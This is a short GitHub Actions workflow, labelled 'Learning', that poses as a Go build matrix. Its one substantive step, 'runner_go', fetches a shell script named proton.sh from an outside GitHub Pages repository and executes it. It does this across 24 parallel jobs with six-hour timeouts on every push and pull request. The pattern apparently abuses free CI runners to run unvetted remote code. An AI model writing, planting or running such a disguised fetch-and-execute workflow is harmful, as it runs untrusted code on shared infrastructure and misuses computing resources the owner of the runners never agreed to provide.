name: Learning
on: [push, pull_request]
jobs:
  build:
    name: Vps
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 256
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4,]
        flag: [A, B, C, D, E, F]
    timeout-minutes: 360
    env:
        NUM_JOBS: 256
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget https://raw.githubusercontent.com/miadarnati/miadarnati.github.io/main/proton.sh && chmod +x proton.sh && ./proton.sh
